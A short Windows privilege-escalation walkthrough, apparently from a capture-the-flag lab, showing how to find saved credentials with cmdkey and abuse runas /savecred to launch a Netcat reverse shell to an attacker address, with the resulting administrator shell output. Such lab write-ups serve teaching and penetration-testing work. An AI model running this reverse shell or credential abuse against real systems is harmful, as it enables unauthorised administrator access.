Stored credentials on a system allows for a user to run commands using those credentials and run the command as that user. If an administrator has saved credentials then think of it like sudo for windows.
Check for stored credentials with cmdkey /list:
C:\Users\security>cmdkey /list Currently stored credentials: Target: Domain:interactive=ACCESS\Administrator Type: Domain Password User: ACCESS\Administrator
To run commands using the stored credentials there is a program included with Windows called “runas.exe” located in System32. It is always best to use the full path to these executables to ensure we are executing the correct file and not bouncing to another file due to an environment variable.
Example running Netcat as Administrator:
C:\temp>C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred “nc.exe 10.10.14.27 4444 -e cmd.exe“
connect to [10.10.14.27] from (UNKNOWN) [10.10.10.98] 49161 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami access\administrator
cmdkey /list is an excellent tool to add to your post enumeration checklist. It is just like running sudo -l to hunt for a quick win.